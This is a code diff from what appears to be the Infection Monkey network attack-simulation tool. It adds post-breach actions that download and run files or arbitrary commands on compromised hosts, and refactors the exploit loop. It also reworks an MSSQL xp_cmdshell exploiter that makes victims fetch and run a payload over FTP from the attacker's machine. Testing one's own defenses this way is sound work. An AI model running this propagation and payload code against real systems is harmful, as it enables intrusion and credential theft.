new file mode 100644
index 000000000..3aff53121
--- /dev/null
+++ b/monkey/common/utils/exploit_enum.py
@@ -0,0 +1,7 @@
+from enum import Enum
+
+
+class ExploitType(Enum):
+ VULNERABILITY = 1
+ OTHER = 8
+ BRUTE_FORCE = 9
diff --git a/monkey/infection_monkey/config.py b/monkey/infection_monkey/config.py
index ff66ff167..0d44cb973 100644
--- a/monkey/infection_monkey/config.py
+++ b/monkey/infection_monkey/config.py
@@ -161,6 +161,10 @@ class Configuration(object):
keep_tunnel_open_time = 60
+ # Monkey files directories
+ monkey_dir_linux = '/tmp/monkey_dir'
+ monkey_dir_windows = r'C:\Windows\Temp\monkey_dir'
+
###########################
# scanners config
###########################
@@ -267,6 +271,10 @@ class Configuration(object):
extract_azure_creds = True
post_breach_actions = []
+ custom_PBA_linux_cmd = ""
+ custom_PBA_windows_cmd = ""
+ PBA_linux_filename = None
+ PBA_windows_filename = None
WormConfiguration = Configuration()
diff --git a/monkey/infection_monkey/example.conf b/monkey/infection_monkey/example.conf
index b3b44c585..7ad23fa7b 100644
--- a/monkey/infection_monkey/example.conf
+++ b/monkey/infection_monkey/example.conf
@@ -8,7 +8,7 @@
],
"keep_tunnel_open_time": 60,
"subnet_scan_list": [
-
+
],
"inaccessible_subnets": [],
"blocked_ips": [],
@@ -28,6 +28,9 @@
"dropper_target_path_win_64": "C:\\Windows\\monkey64.exe",
"dropper_target_path_linux": "/tmp/monkey",
+ monkey_dir_linux = '/tmp/monkey_dir',
+ monkey_dir_windows = r'C:\Windows\Temp\monkey_dir',
+
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not",
@@ -98,4 +101,8 @@
"victims_max_exploit": 7,
"victims_max_find": 30,
"post_breach_actions" : []
+ custom_PBA_linux_cmd = ""
+ custom_PBA_windows_cmd = ""
+ PBA_linux_filename = None
+ PBA_windows_filename = None
}
diff --git a/monkey/infection_monkey/exploit/__init__.py b/monkey/infection_monkey/exploit/__init__.py
index 9ea2bcc75..0d4300b5f 100644
--- a/monkey/infection_monkey/exploit/__init__.py
+++ b/monkey/infection_monkey/exploit/__init__.py
@@ -1,5 +1,6 @@
from abc import ABCMeta, abstractmethod
import infection_monkey.config
+from common.utils.exploit_enum import ExploitType
__author__ = 'itamar'
@@ -9,6 +10,9 @@ class HostExploiter(object):
_TARGET_OS_TYPE = []
+ # Usual values are 'vulnerability' or 'brute_force'
+ EXPLOIT_TYPE = ExploitType.VULNERABILITY
+
def __init__(self, host):
self._config = infection_monkey.config.WormConfiguration
self._exploit_info = {}
diff --git a/monkey/infection_monkey/exploit/elasticgroovy.py b/monkey/infection_monkey/exploit/elasticgroovy.py
index 2de001ba3..faa6681b4 100644
--- a/monkey/infection_monkey/exploit/elasticgroovy.py
+++ b/monkey/infection_monkey/exploit/elasticgroovy.py
@@ -8,7 +8,8 @@ import json
import logging
import requests
from infection_monkey.exploit.web_rce import WebRCE
-from infection_monkey.model import WGET_HTTP_UPLOAD, RDP_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX
+from infection_monkey.model import WGET_HTTP_UPLOAD, RDP_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX,\
+ DOWNLOAD_TIMEOUT
from infection_monkey.network.elasticfinger import ES_PORT, ES_SERVICE
import re
@@ -47,7 +48,11 @@ class ElasticGroovyExploiter(WebRCE):
def exploit(self, url, command):
command = re.sub(r"\\", r"\\\\\\\\", command)
payload = self.JAVA_CMD % command
- response = requests.get(url, data=payload)
+ try:
+ response = requests.get(url, data=payload, timeout=DOWNLOAD_TIMEOUT)
+ except requests.ReadTimeout:
+ LOG.error("Elastic couldn't upload monkey, because server didn't respond to upload request.")
+ return False
result = self.get_results(response)
if not result:
return False
@@ -79,4 +84,4 @@ class ElasticGroovyExploiter(WebRCE):
return False
except Exception as e:
LOG.error("Host's exploitability check failed due to: %s" % e)
- return False
\ No newline at end of file
+ return False
diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py
index b34178dd6..2e8bf6c90 100644
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@@ -1,11 +1,10 @@
import os
-import platform
-from os import path
import logging
import pymssql
from infection_monkey.exploit import HostExploiter, mssqlexec_utils
+from common.utils.exploit_enum import ExploitType
__author__ = 'Maor Rayzin'
@@ -15,10 +14,11 @@ LOG = logging.getLogger(__name__)
class MSSQLExploiter(HostExploiter):
_TARGET_OS_TYPE = ['windows']
+ EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
LOGIN_TIMEOUT = 15
SQL_DEFAULT_TCP_PORT = '1433'
- DEFAULT_PAYLOAD_PATH_WIN = os.path.expandvars(r'%TEMP%\~PLD123.bat')
- DEFAULT_PAYLOAD_PATH_LINUX = '/tmp/~PLD123.bat'
+ DEFAULT_PAYLOAD_PATH_WIN = os.path.expandvars(r'~PLD123.bat')
+ DEFAULT_PAYLOAD_PATH_LINUX = '~PLD123.bat'
def __init__(self, host):
super(MSSQLExploiter, self).__init__(host)
@@ -60,7 +60,6 @@ class MSSQLExploiter(HostExploiter):
return False
def handle_payload(self, cursor, payload):
-
"""
Handles the process of payload sending and execution, prepares the attack and details.
@@ -72,7 +71,7 @@ class MSSQLExploiter(HostExploiter):
True or False depends on process success
"""
- chosen_attack = self.attacks_list[0](payload, cursor, self.host.ip_addr)
+ chosen_attack = self.attacks_list[0](payload, cursor, self.host)
if chosen_attack.send_payload():
LOG.debug('Payload: {0} has been successfully sent to host'.format(payload))
diff --git a/monkey/infection_monkey/exploit/mssqlexec_utils.py b/monkey/infection_monkey/exploit/mssqlexec_utils.py
index ab8b88e60..51293dfe3 100644
--- a/monkey/infection_monkey/exploit/mssqlexec_utils.py
+++ b/monkey/infection_monkey/exploit/mssqlexec_utils.py
@@ -8,6 +8,7 @@ from infection_monkey.exploit.tools import get_interface_to_target
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
+from time import sleep
__author__ = 'Maor Rayzin'
@@ -17,7 +18,8 @@ FTP_SERVER_PORT = 1026
FTP_SERVER_ADDRESS = ''
FTP_SERVER_USER = 'brute'
FTP_SERVER_PASSWORD = 'force'
-FTP_WORKING_DIR = '.'
+FTP_WORK_DIR_WINDOWS = os.path.expandvars(r'%TEMP%/')
+FTP_WORK_DIR_LINUX = '/tmp/'
LOG = logging.getLogger(__name__)
@@ -30,37 +32,29 @@ class FTP(object):
user (str): User for FTP server auth
password (str): Password for FTP server auth
working_dir (str): The local working dir to init the ftp server on.
-
"""
- def __init__(self, user=FTP_SERVER_USER, password=FTP_SERVER_PASSWORD,
- working_dir=FTP_WORKING_DIR):
+ def __init__(self, host, user=FTP_SERVER_USER, password=FTP_SERVER_PASSWORD):
"""Look at class level docstring."""
-
+ self.dst_ip = host.ip_addr
self.user = user
self.password = password
- self.working_dir = working_dir
+ self.working_dir = FTP_WORK_DIR_LINUX if 'linux' in host.os['type'] else FTP_WORK_DIR_WINDOWS
- def run_server(self, user=FTP_SERVER_USER, password=FTP_SERVER_PASSWORD,
- working_dir=FTP_WORKING_DIR):
+ def run_server(self):
""" Configures and runs the ftp server to listen forever until stopped.
-
- Args:
- user (str): User for FTP server auth
- password (str): Password for FTP server auth
- working_dir (str): The local working dir to init the ftp server on.
"""
# Defining an authorizer and configuring the ftp user
authorizer = DummyAuthorizer()
- authorizer.add_user(user, password, working_dir, perm='elradfmw')
+ authorizer.add_user(self.user, self.password, self.working_dir, perm='elr')
# Normal ftp handler
handler = FTPHandler
handler.authorizer = authorizer
- address = (FTP_SERVER_ADDRESS, FTP_SERVER_PORT)
+ address = (get_interface_to_target(self.dst_ip), FTP_SERVER_PORT)
# Configuring the server using the address and handler. Global usage in stop_server thats why using self keyword
self.server = FTPServer(address, handler)
@@ -100,14 +94,15 @@ class CmdShellAttack(AttackHost):
Args:
payload_path (str): The local path of the payload file
cursor (pymssql.conn.obj): A cursor object from pymssql.connect to run commands with.
+ host (model.host.VictimHost): Host this attack is going to target
"""
- def __init__(self, payload_path, cursor, dst_ip_address):
+ def __init__(self, payload_path, cursor, host):
super(CmdShellAttack, self).__init__(payload_path)
- self.ftp_server, self.ftp_server_p = self.__init_ftp_server()
+ self.ftp_server, self.ftp_server_p = self.__init_ftp_server(host)
self.cursor = cursor
- self.attacker_ip = get_interface_to_target(dst_ip_address)
+ self.attacker_ip = get_interface_to_target(host.ip_addr)
def send_payload(self):
"""
@@ -121,7 +116,6 @@ class CmdShellAttack(AttackHost):
shellcmd1 = """xp_cmdshell "mkdir c:\\tmp& chdir c:\\tmp& echo open {0} {1}>ftp.txt& \
echo {2}>>ftp.txt" """.format(self.attacker_ip, FTP_SERVER_PORT, FTP_SERVER_USER)
shellcmd2 = """xp_cmdshell "chdir c:\\tmp& echo {0}>>ftp.txt" """.format(FTP_SERVER_PASSWORD)
-
shellcmd3 = """xp_cmdshell "chdir c:\\tmp& echo get {0}>>ftp.txt& echo bye>>ftp.txt" """\
.format(self.payload_path)
shellcmd4 = """xp_cmdshell "chdir c:\\tmp& cmd /c ftp -s:ftp.txt" """
@@ -129,11 +123,11 @@ class CmdShellAttack(AttackHost):
# Checking to see if ftp server is up
if self.ftp_server_p and self.ftp_server:
-
try:
# Running the cmd on remote host
for cmd in shellcmds:
self.cursor.execute(cmd)
+ sleep(0.5)
except Exception as e:
LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True)
self.ftp_server_p.terminate()
@@ -174,7 +168,7 @@ class CmdShellAttack(AttackHost):
self.ftp_server_p.terminate()
return False
- except pymssql.OperationalError:
+ except pymssql.OperationalError as e:
LOG.error('Executing payload: {0} failed'.format(payload_file_name), exc_info=True)
self.ftp_server_p.terminate()
return False
@@ -193,7 +187,7 @@ class CmdShellAttack(AttackHost):
LOG.error('Error cleaning the attack files using xp_cmdshell, files may remain on host', exc_info=True)
return False
- def __init_ftp_server(self):
+ def __init_ftp_server(self, host):
"""
Init an FTP server using FTP class on a different process
@@ -203,7 +197,7 @@ class CmdShellAttack(AttackHost):
"""
try:
- ftp_s = FTP()
+ ftp_s = FTP(host)
multiprocessing.log_to_stderr(logging.DEBUG)
p = multiprocessing.Process(target=ftp_s.run_server)
p.start()
diff --git a/monkey/infection_monkey/exploit/rdpgrinder.py b/monkey/infection_monkey/exploit/rdpgrinder.py
index a67a812f6..dcef9551c 100644
--- a/monkey/infection_monkey/exploit/rdpgrinder.py
+++ b/monkey/infection_monkey/exploit/rdpgrinder.py
@@ -16,6 +16,7 @@ from infection_monkey.model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS
from infection_monkey.network.tools import check_tcp_port
from infection_monkey.exploit.tools import build_monkey_commandline
from infection_monkey.utils import utf_to_ascii
+from common.utils.exploit_enum import ExploitType
__author__ = 'hoffer'
@@ -235,6 +236,7 @@ class CMDClientFactory(rdp.ClientFactory):
class RdpExploiter(HostExploiter):
_TARGET_OS_TYPE = ['windows']
+ EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
def __init__(self, host):
super(RdpExploiter, self).__init__(host)
diff --git a/monkey/infection_monkey/exploit/smbexec.py b/monkey/infection_monkey/exploit/smbexec.py
index 7528e08ba..579fd8f1f 100644
--- a/monkey/infection_monkey/exploit/smbexec.py
+++ b/monkey/infection_monkey/exploit/smbexec.py
@@ -9,12 +9,14 @@ from infection_monkey.model import MONKEY_CMDLINE_DETACHED_WINDOWS, DROPPER_CMDL
from infection_monkey.network import SMBFinger
from infection_monkey.network.tools import check_tcp_port
from infection_monkey.exploit.tools import build_monkey_commandline
+from common.utils.exploit_enum import ExploitType
LOG = getLogger(__name__)
class SmbExploiter(HostExploiter):
_TARGET_OS_TYPE = ['windows']
+ EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
KNOWN_PROTOCOLS = {
'139/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 139),
'445/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 445),
diff --git a/monkey/infection_monkey/exploit/sshexec.py b/monkey/infection_monkey/exploit/sshexec.py
index 82dd1f4d7..8a58f18c6 100644
--- a/monkey/infection_monkey/exploit/sshexec.py
+++ b/monkey/infection_monkey/exploit/sshexec.py
@@ -10,6 +10,7 @@ from infection_monkey.exploit.tools import get_target_monkey, get_monkey_depth
from infection_monkey.model import MONKEY_ARG
from infection_monkey.network.tools import check_tcp_port
from infection_monkey.exploit.tools import build_monkey_commandline
+from common.utils.exploit_enum import ExploitType
__author__ = 'hoffer'
@@ -20,6 +21,7 @@ TRANSFER_UPDATE_RATE = 15
class SSHExploiter(HostExploiter):
_TARGET_OS_TYPE = ['linux', None]
+ EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
def __init__(self, host):
super(SSHExploiter, self).__init__(host)
diff --git a/monkey/infection_monkey/exploit/tools.py b/monkey/infection_monkey/exploit/tools.py
index a7a137557..0b496f8be 100644
--- a/monkey/infection_monkey/exploit/tools.py
+++ b/monkey/infection_monkey/exploit/tools.py
@@ -7,7 +7,6 @@ import socket
import struct
import sys
import urllib
-from difflib import get_close_matches
from impacket.dcerpc.v5 import transport, srvs
from impacket.dcerpc.v5.dcom import wmi
@@ -19,7 +18,6 @@ from impacket.smbconnection import SMBConnection, SMB_DIALECT
import infection_monkey.config
import infection_monkey.monkeyfs as monkeyfs
-from infection_monkey.network import local_ips
from infection_monkey.network.firewall import app as firewall
from infection_monkey.network.info import get_free_tcp_port, get_routes
from infection_monkey.transport import HTTPServer, LockedHTTPServer
@@ -418,9 +416,15 @@ class HTTPTools(object):
def get_interface_to_target(dst):
if sys.platform == "win32":
- ips = local_ips()
- matches = get_close_matches(dst, ips)
- return matches[0] if (len(matches) > 0) else ips[0]
+ s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+ try:
+ s.connect((dst, 1))
+ ip_to_dst = s.getsockname()[0]
+ except KeyError:
+ ip_to_dst = '127.0.0.1'
+ finally:
+ s.close()
+ return ip_to_dst
else:
# based on scapy implementation
@@ -430,17 +434,17 @@ def get_interface_to_target(dst):
routes = get_routes()
dst = atol(dst)
- pathes = []
+ paths = []
for d, m, gw, i, a in routes:
aa = atol(a)
if aa == dst:
- pathes.append((0xffffffff, ("lo", a, "0.0.0.0")))
+ paths.append((0xffffffff, ("lo", a, "0.0.0.0")))
if (dst & m) == (d & m):
- pathes.append((m, (i, a, gw)))
- if not pathes:
+ paths.append((m, (i, a, gw)))
+ if not paths:
return None
- pathes.sort()
- ret = pathes[-1][1]
+ paths.sort()
+ ret = paths[-1][1]
return ret[1]
diff --git a/monkey/infection_monkey/exploit/wmiexec.py b/monkey/infection_monkey/exploit/wmiexec.py
index 1a8cb3386..66cc30fa9 100644
--- a/monkey/infection_monkey/exploit/wmiexec.py
+++ b/monkey/infection_monkey/exploit/wmiexec.py
@@ -9,12 +9,14 @@ from infection_monkey.exploit import HostExploiter
from infection_monkey.exploit.tools import SmbTools, WmiTools, AccessDeniedException, get_target_monkey, \
get_monkey_depth, build_monkey_commandline
from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
+from common.utils.exploit_enum import ExploitType
LOG = logging.getLogger(__name__)
class WmiExploiter(HostExploiter):
_TARGET_OS_TYPE = ['windows']
+ EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
def __init__(self, host):
super(WmiExploiter, self).__init__(host)
diff --git a/monkey/infection_monkey/monkey.py b/monkey/infection_monkey/monkey.py
index f2f9f4f42..df7bcf820 100644
--- a/monkey/infection_monkey/monkey.py
+++ b/monkey/infection_monkey/monkey.py
@@ -16,6 +16,9 @@ from infection_monkey.network.network_scanner import NetworkScanner
from infection_monkey.system_info import SystemInfoCollector
from infection_monkey.system_singleton import SystemSingleton
from infection_monkey.windows_upgrader import WindowsUpgrader
+from infection_monkey.post_breach.post_breach_handler import PostBreach
+from common.utils.attack_utils import ScanStatus
+from infection_monkey.transport.attack_telems.victim_host_telem import VictimHostTelem
__author__ = 'itamar'
@@ -76,6 +79,9 @@ class InfectionMonkey(object):
LOG.info("Monkey couldn't find server. Going down.")
return
+ # Create a dir for monkey files if there isn't one
+ utils.create_monkey_dir()
+
if WindowsUpgrader.should_upgrade():
self._upgrading_to_64 = True
self._singleton.unlock()
@@ -113,6 +119,8 @@ class InfectionMonkey(object):
action = action_class()
action.act()
+ PostBreach().execute()
+
if 0 == WormConfiguration.depth:
LOG.debug("Reached max depth, shutting down")
ControlClient.send_telemetry("trace", "Reached max depth, shutting down")
@@ -167,44 +175,19 @@ class InfectionMonkey(object):
LOG.debug("Default server: %s set to machine: %r" % (self._default_server, machine))
machine.set_default_server(self._default_server)
- successful_exploiter = None
+ # Order exploits according to their type
+ self._exploiters = sorted(self._exploiters, key=lambda exploiter_: exploiter_.EXPLOIT_TYPE.value)
+ host_exploited = False
for exploiter in [exploiter(machine) for exploiter in self._exploiters]:
- if not exploiter.is_os_supported():
- LOG.info("Skipping exploiter %s host:%r, os is not supported",
- exploiter.__class__.__name__, machine)
- continue
-
- LOG.info("Trying to exploit %r with exploiter %s...", machine, exploiter.__class__.__name__)
-
- result = False
- try:
- result = exploiter.exploit_host()
- if result:
- successful_exploiter = exploiter
- break
- else:
- LOG.info("Failed exploiting %r with exploiter %s", machine, exploiter.__class__.__name__)
-
- except Exception as exc:
- LOG.exception("Exception while attacking %s using %s: %s",
- machine, exploiter.__class__.__name__, exc)
- finally:
- exploiter.send_exploit_telemetry(result)
-
- if successful_exploiter:
- self._exploited_machines.add(machine)
-
- LOG.info("Successfully propagated to %s using %s",
- machine, successful_exploiter.__class__.__name__)
-
- # check if max-exploitation limit is reached
- if WormConfiguration.victims_max_exploit <= len(self._exploited_machines):
- self._keep_running = False
-
- LOG.info("Max exploited victims reached (%d)", WormConfiguration.victims_max_exploit)
+ if self.try_exploiting(machine, exploiter):
+ host_exploited = True
+ VictimHostTelem('T1210', ScanStatus.USED.value, machine=machine).send()
break
- else:
+ if not host_exploited:
self._fail_exploitation_machines.add(machine)
+ VictimHostTelem('T1210', ScanStatus.SCANNED.value, machine=machine).send()
+ if not self._keep_running:
+ break
if (not is_empty) and (WormConfiguration.max_iterations > iteration_index + 1):
time_to_sleep = WormConfiguration.timeout_between_iterations
@@ -242,6 +225,7 @@ class InfectionMonkey(object):
self.send_log()
self._singleton.unlock()
+ utils.remove_monkey_dir()
InfectionMonkey.self_delete()
LOG.info("Monkey is shutting down")
@@ -279,3 +263,50 @@ class InfectionMonkey(object):
log = ''
ControlClient.send_log(log)
+
+ def try_exploiting(self, machine, exploiter):
+ """
+ Workflow of exploiting one machine with one exploiter
+ :param machine: Machine monkey tries to exploit
+ :param exploiter: Exploiter to use on that machine
+ :return: True if successfully exploited, False otherwise
+ """
+ if not exploiter.is_os_supported():
+ LOG.info("Skipping exploiter %s host:%r, os is not supported",
+ exploiter.__class__.__name__, machine)
+ return False
+
+ LOG.info("Trying to exploit %r with exploiter %s...", machine, exploiter.__class__.__name__)
+
+ result = False
+ try:
+ result = exploiter.exploit_host()
+ if result:
+ self.successfully_exploited(machine, exploiter)
+ return True
+ else:
+ LOG.info("Failed exploiting %r with exploiter %s", machine, exploiter.__class__.__name__)
+
+ except Exception as exc:
+ LOG.exception("Exception while attacking %s using %s: %s",
+ machine, exploiter.__class__.__name__, exc)
+ finally:
+ exploiter.send_exploit_telemetry(result)
+ return False
+
+ def successfully_exploited(self, machine, exploiter):
+ """
+ Workflow of registering successfully exploited machine
+ :param machine: machine that was exploited
+ :param exploiter: exploiter that succeeded
+ """
+ self._exploited_machines.add(machine)
+
+ LOG.info("Successfully propagated to %s using %s",
+ machine, exploiter.__class__.__name__)
+
+ # check if max-exploitation limit is reached
+ if WormConfiguration.victims_max_exploit <= len(self._exploited_machines):
+ self._keep_running = False
+
+ LOG.info("Max exploited victims reached (%d)", WormConfiguration.victims_max_exploit)
diff --git a/monkey/infection_monkey/post_breach/file_execution.py b/monkey/infection_monkey/post_breach/file_execution.py
new file mode 100644
index 000000000..5f52a29a6
--- /dev/null
+++ b/monkey/infection_monkey/post_breach/file_execution.py
@@ -0,0 +1,68 @@
+from infection_monkey.post_breach.pba import PBA
+from infection_monkey.control import ControlClient
+from infection_monkey.config import WormConfiguration
+from infection_monkey.utils import get_monkey_dir_path
+import requests
+import os
+import logging
+
+LOG = logging.getLogger(__name__)
+
+__author__ = 'VakarisZ'
+
+# Default commands for executing PBA file and then removing it
+DEFAULT_LINUX_COMMAND = "chmod +x {0} ; {0} ; rm {0}"
+DEFAULT_WINDOWS_COMMAND = "{0} & del {0}"
+
+
+class FileExecution(PBA):
+ """
+ Defines user's file execution post breach action.
+ """
+ def __init__(self, linux_command="", windows_command=""):
+ self.linux_filename = WormConfiguration.PBA_linux_filename
+ self.windows_filename = WormConfiguration.PBA_windows_filename
+ super(FileExecution, self).__init__("File execution", linux_command, windows_command)
+
+ def _execute_linux(self):
+ FileExecution.download_PBA_file(get_monkey_dir_path(), self.linux_filename)
+ return super(FileExecution, self)._execute_linux()
+
+ def _execute_win(self):
+ FileExecution.download_PBA_file(get_monkey_dir_path(), self.windows_filename)
+ return super(FileExecution, self)._execute_win()
+
+ def add_default_command(self, is_linux):
+ """
+ Replaces current (likely empty) command with default file execution command (that changes permissions, executes
+ and finally deletes post breach file).
+ Default commands are defined as globals in this module.
+ :param is_linux: Boolean that indicates for which OS the command is being set.
+ """
+ if is_linux:
+ file_path = os.path.join(get_monkey_dir_path(), self.linux_filename)
+ self.linux_command = DEFAULT_LINUX_COMMAND.format(file_path)
+ else:
+ file_path = os.path.join(get_monkey_dir_path(), self.windows_filename)
+ self.windows_command = DEFAULT_WINDOWS_COMMAND.format(file_path)
+
+ @staticmethod
+ def download_PBA_file(dst_dir, filename):
+ """
+ Handles post breach action file download
+ :param dst_dir: Destination directory
+ :param filename: Filename
+ :return: True if successful, false otherwise
+ """
+
+ PBA_file_contents = requests.get("https://%s/api/pba/download/%s" %
+ (WormConfiguration.current_server, filename),
+ verify=False,
+ proxies=ControlClient.proxies)
+ try:
+ with open(os.path.join(dst_dir, filename), 'wb') as written_PBA_file:
+ written_PBA_file.write(PBA_file_contents.content)
+ return True
+ except IOError as e:
+ LOG.error("Can not download post breach file to target machine, because %s" % e)
+ return False
diff --git a/monkey/infection_monkey/post_breach/pba.py b/monkey/infection_monkey/post_breach/pba.py
new file mode 100644
index 000000000..09fe613b3
--- /dev/null
+++ b/monkey/infection_monkey/post_breach/pba.py
@@ -0,0 +1,68 @@
+import logging
+from infection_monkey.control import ControlClient
+import subprocess
+import socket
+
+LOG = logging.getLogger(__name__)
+
+__author__ = 'VakarisZ'
+
+
+class PBA(object):
+ """
+ Post breach action object. Can be extended to support more than command execution on target machine.
+ """
+ def __init__(self, name="unknown", linux_command="", windows_command=""):
+ """
+ :param name: Name of post breach action.
+ :param linux_command: Command that will be executed on linux machine
+ :param windows_command: Command that will be executed on windows machine
+ """
+ self.linux_command = linux_command
+ self.windows_command = windows_command
+ self.name = name
+
+ def run(self, is_linux):
+ """
+ Runs post breach action command
+ :param is_linux: boolean that indicates on which os monkey is running
+ """
+ if is_linux:
+ command = self.linux_command
+ exec_funct = self._execute_linux
+ else:
+ command = self.windows_command
+ exec_funct = self._execute_win
+ if command:
+ hostname = socket.gethostname()
+ ControlClient.send_telemetry('post_breach', {'command': command,
+ 'result': exec_funct(),
+ 'name': self.name,
+ 'hostname': hostname,
+ 'ip': socket.gethostbyname(hostname)
+ })
+
+ def _execute_linux(self):
+ """
+ Default linux PBA execution function. Override it if additional functionality is needed
+ """
+ return self._execute_default(self.linux_command)
+
+ def _execute_win(self):
+ """
+ Default linux PBA execution function. Override it if additional functionality is needed
+ """
+ return self._execute_default(self.windows_command)
+
+ @staticmethod
+ def _execute_default(command):
+ """
+ Default post breach command execution routine
+ :param command: What command to execute
+ :return: Tuple of command's output string and boolean, indicating if it succeeded
+ """
+ try:
+ return subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True), True
+ except subprocess.CalledProcessError as e:
+ # Return error output of the command
+ return e.output, False
diff --git a/monkey/infection_monkey/post_breach/post_breach_handler.py b/monkey/infection_monkey/post_breach/post_breach_handler.py
new file mode 100644
index 000000000..ff24ebbbb
--- /dev/null
+++ b/monkey/infection_monkey/post_breach/post_breach_handler.py
@@ -0,0 +1,83 @@
+import logging
+import infection_monkey.config
+from file_execution import FileExecution
+from pba import PBA
+from infection_monkey.utils import is_windows_os
+from infection_monkey.utils import get_monkey_dir_path
+
+LOG = logging.getLogger(__name__)
+
+__author__ = 'VakarisZ'
+
+DIR_CHANGE_WINDOWS = 'cd %s & '
+DIR_CHANGE_LINUX = 'cd %s ; '
+
+
+class PostBreach(object):
+ """
+ This class handles post breach actions execution
+ """
+ def __init__(self):
+ self.os_is_linux = not is_windows_os()
+ self.pba_list = self.config_to_pba_list(infection_monkey.config.WormConfiguration)
+
+ def execute(self):
+ """
+ Executes all post breach actions.
+ """
+ for pba in self.pba_list:
+ pba.run(self.os_is_linux)
+ LOG.info("Post breach actions executed")
+
+ @staticmethod
+ def config_to_pba_list(config):
+ """
+ Returns a list of PBA objects generated from config.
+ :param config: Monkey configuration
+ :return: A list of PBA objects.
+ """
+ pba_list = []
+ pba_list.extend(PostBreach.get_custom_PBA(config))
+
+ return pba_list
+
+ @staticmethod
+ def get_custom_PBA(config):
+ """
+ Creates post breach actions depending on users input into 'custom post breach' config section
+ :param config: monkey's configuration
+ :return: List of PBA objects ([user's file execution PBA, user's command execution PBA])
+ """
+ custom_list = []
+ file_pba = FileExecution()
+ command_pba = PBA(name="Custom")
+
+ if not is_windows_os():
+ # Add linux commands to PBA's
+ if config.PBA_linux_filename:
+ if config.custom_PBA_linux_cmd:
+ # Add change dir command, because user will try to access his file
+ file_pba.linux_command = (DIR_CHANGE_LINUX % get_monkey_dir_path()) + config.custom_PBA_linux_cmd
+ else:
+ file_pba.add_default_command(is_linux=True)
+ elif config.custom_PBA_linux_cmd:
+ command_pba.linux_command = config.custom_PBA_linux_cmd
+ else:
+ # Add windows commands to PBA's
+ if config.PBA_windows_filename:
+ if config.custom_PBA_windows_cmd:
+ # Add change dir command, because user will try to access his file
+ file_pba.windows_command = (DIR_CHANGE_WINDOWS % get_monkey_dir_path()) + \
+ config.custom_PBA_windows_cmd
+ else:
+ file_pba.add_default_command(is_linux=False)
+ elif config.custom_PBA_windows_cmd:
+ command_pba.windows_command = config.custom_PBA_windows_cmd
+
+ # Add PBA's to list
+ if file_pba.linux_command or file_pba.windows_command:
+ custom_list.append(file_pba)
+ if command_pba.windows_command or command_pba.linux_command:
+ custom_list.append(command_pba)
+
+ return custom_list
diff --git a/monkey/infection_monkey/readme.txt b/monkey/infection_monkey/readme.txt
index 08e17014e..0b56da2f7 100644
--- a/monkey/infection_monkey/readme.txt
+++ b/monkey/infection_monkey/readme.txt
@@ -13,7 +13,7 @@ The monkey is composed of three separate parts.
Download and install from: https://www.python.org/downloads/release/python-2715/
2. Add python directories to PATH environment variable (if you didn't install ActiveState Python)
a. Run the following command on a cmd console (Replace C:\Python27 with your python directory if it's different)
- setx /M PATH "%PATH%;C:\Python27;C:\Pytohn27\Scripts
+ setx /M PATH "%PATH%;C:\Python27;C:\Python27\Scripts
b. Close the console, make sure you execute all commands in a new cmd console from now on.
3. Install further dependencies
a. install VCForPython27.msi
@@ -72,8 +72,7 @@ b. Download our pre-built sambacry binaries
-- Mimikatz --
-Mimikatz is required for the Monkey to be able to steal credentials on Windows. It's possible to either compile from sources (requires Visual Studio 2013 and up) or download the binaries from
-You can either build them yourself or download pre-built binaries.
+Mimikatz is required for the Monkey to be able to steal credentials on Windows. It's possible to either compile binaries from source (requires Visual Studio 2013 and up) or download them from our repository.
a. Build Mimikatz yourself
a.0. Building mimikatz requires Visual Studio 2013 and up
a.1. Clone our version of mimikatz from https://github.com/guardicore/mimikatz/tree/1.1.0
@@ -84,7 +83,7 @@ a. Build Mimikatz yourself
a.3.3. The zip file should be named mk32.zip/mk64.zip accordingly.
a.3.4. Zipping with 7zip has been tested. Other zipping software may not work.
-b. Download our pre-built traceroute binaries
+b. Download our pre-built mimikatz binaries
b.1. Download both 32 and 64 bit zipped DLLs from https://github.com/guardicore/mimikatz/releases/tag/1.1.0
b.2. Place them under [code location]\infection_monkey\bin
diff --git a/monkey/infection_monkey/requirements_linux.txt b/monkey/infection_monkey/requirements_linux.txt
index f223158fe..bef031d2e 100644
--- a/monkey/infection_monkey/requirements_linux.txt
+++ b/monkey/infection_monkey/requirements_linux.txt
@@ -17,3 +17,4 @@ ipaddress
wmi
pymssql
pyftpdlib
+enum34
diff --git a/monkey/infection_monkey/requirements_windows.txt b/monkey/infection_monkey/requirements_windows.txt
index 5ec5ebbb9..5689ca332 100644
--- a/monkey/infection_monkey/requirements_windows.txt
+++ b/monkey/infection_monkey/requirements_windows.txt
@@ -17,4 +17,5 @@ ipaddress
wmi
pywin32
pymssql
-pyftpdlib
\ No newline at end of file
+pyftpdlib
+enum34
diff --git a/monkey/infection_monkey/transport/attack_telems/__init__.py b/monkey/infection_monkey/transport/attack_telems/__init__.py
new file mode 100644
index 000000000..98867ed4d
--- /dev/null
+++ b/monkey/infection_monkey/transport/attack_telems/__init__.py
@@ -0,0 +1 @@
+__author__ = 'VakarisZ'
diff --git a/monkey/infection_monkey/transport/attack_telems/base_telem.py b/monkey/infection_monkey/transport/attack_telems/base_telem.py
new file mode 100644
index 000000000..9d0275356
--- /dev/null
+++ b/monkey/infection_monkey/transport/attack_telems/base_telem.py
@@ -0,0 +1,41 @@
+from infection_monkey.config import WormConfiguration, GUID
+import requests
